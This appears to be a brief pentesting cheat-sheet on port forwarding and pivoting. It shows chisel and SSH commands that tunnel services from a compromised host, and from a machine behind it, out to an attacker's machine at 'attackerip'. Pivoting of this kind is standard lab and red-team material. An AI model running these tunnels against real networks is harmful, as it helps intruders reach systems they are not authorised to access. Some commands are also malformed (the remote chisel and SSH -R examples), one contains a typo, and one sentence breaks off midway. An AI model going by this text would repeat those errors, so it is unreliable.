Port Forwarding

Port forwarding is a technique where the service running on the target machine / on any other machine on the network is forwarded to the attacker's machine which can be then accessed locally

Commonly used tools

  • Chisel

  • SSH

Local Port Forwarding

Local port forwarding is a technique to transfer the service running on the compromised machine to the attackers' machine

Chisel

Attackers Machine:

./chisel server -p 1337 --reverse

Compromised machine

# forwarding service on the compromised machine on port 5000 to attacker machines port 5000
./chisel client attackerip:1337 R:5000:127.0.0.1:5000

SSH

# The same on ssh
# Format: ssh -L attckermahineport:127.0.0.1:targetserviceport user@target
ssh -L 5000:127.0.0.1:5000 user@targetIP

Remote Port Forwarding

Remote port forwarding is a technique to transfer the service running on the machine which is persent in the same network as the compromised machine to the attackers' machine

Network Setup:

Machine A : Attackers Machine

Machine B : Compromised Machine ( Has an network card to communicate with Y network )

Machine C : Machine on Y network A ---> B ( Attacker can communicate with the Machine B )

B ---> C ( Machine B can communicate with both A and C with different network cards )

A --x-> C ( Attacker cannot communicate with the C since they are

Chisel

Attackers Machine:

./chiel server -p 9001 --reverse

Compromised Machine ( Machine B ):

# Machine C has a service on its port 3000 which has to be forwarded to attacker machine's port 3000
./chisel client attackerip:9001 R:3000:127.0.0.1:machineCIP:3000

SSH

# The same can be performed with SSH
# Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
ssh -R machineCIP:3000:127.0.0.1:3000 user@machineBIP

Dynamic Port Forwarding

Dynamic Port forwarding is a pivoting technique which allows the attacker to access the services fully running on the compromized system with the use of proxychains

Last updated